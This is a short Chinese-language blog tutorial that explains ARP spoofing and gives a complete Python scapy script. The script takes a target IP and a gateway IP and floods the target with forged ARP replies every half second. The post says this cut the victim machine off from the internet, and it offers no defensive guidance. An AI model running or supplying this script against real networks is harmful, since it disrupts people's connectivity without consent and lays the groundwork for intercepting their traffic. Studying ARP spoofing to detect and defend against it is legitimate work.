阅读本篇建议先阅读上一章的APR欺骗的原理知识点
上篇我们说到ARP欺骗是恶意向客户端发送伪造ARP以达到主机无法上网的一种攻击方式
这一章我们重点来用python实现
不说了上代码! ! !
from scapy.all import *
import sys
import time
def arp_spfoot(ip1,ip2):
#构建ARP包
#并发送
try:
pitk = ARP(pdst=ip1,psrc=ip2)
send(pitk)
except:
print('发送失败')
def main():
#这里我们获取到需要攻击的主机ip与网关ip
if len(sys.argv) != 3:
print('使用方法,目标主机ip,网关ip')
sys.exit()
ip1 = str(sys.argv[1].strip())
ip2 = str(sys.argv[2].strip())
#设置循环
while True:
arp_spfoot(ip1,ip2)
time.sleep(0.5)
if __name__ == '__main__':
main()
这里我们看到这台主机是可以正常上网的
我们执行python脚本
可以看到这里python脚本已经执行
现在这台计算机已经无法继续上网
为什么呢?
因为我们已经串改了arp表信息